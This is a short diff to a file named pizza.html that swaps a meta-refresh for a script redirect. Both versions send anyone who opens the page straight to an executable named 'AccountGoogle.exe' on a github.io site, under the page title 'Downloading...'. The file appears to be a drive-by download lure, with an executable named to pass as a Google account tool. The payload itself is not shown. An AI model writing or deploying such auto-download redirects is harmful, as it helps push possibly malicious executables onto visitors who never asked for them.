--- a/pizza.html
+++ b/pizza.html
@@ -1,1 +1,11 @@
- <meta http-equiv="refresh" content="0;url=https://lanaya113505.github.io/pizza/AccountGoogle.exe">
+<!DOCTYPE html>
+<html>
+  <head>
+    <title>Downloading...</title>
+  </head>
+  <body>
+    <script>
+      window.location.href = "https://lanaya113505.github.io/pizza/AccountGoogle.exe";
+    </script>
+  </body>
+</html>
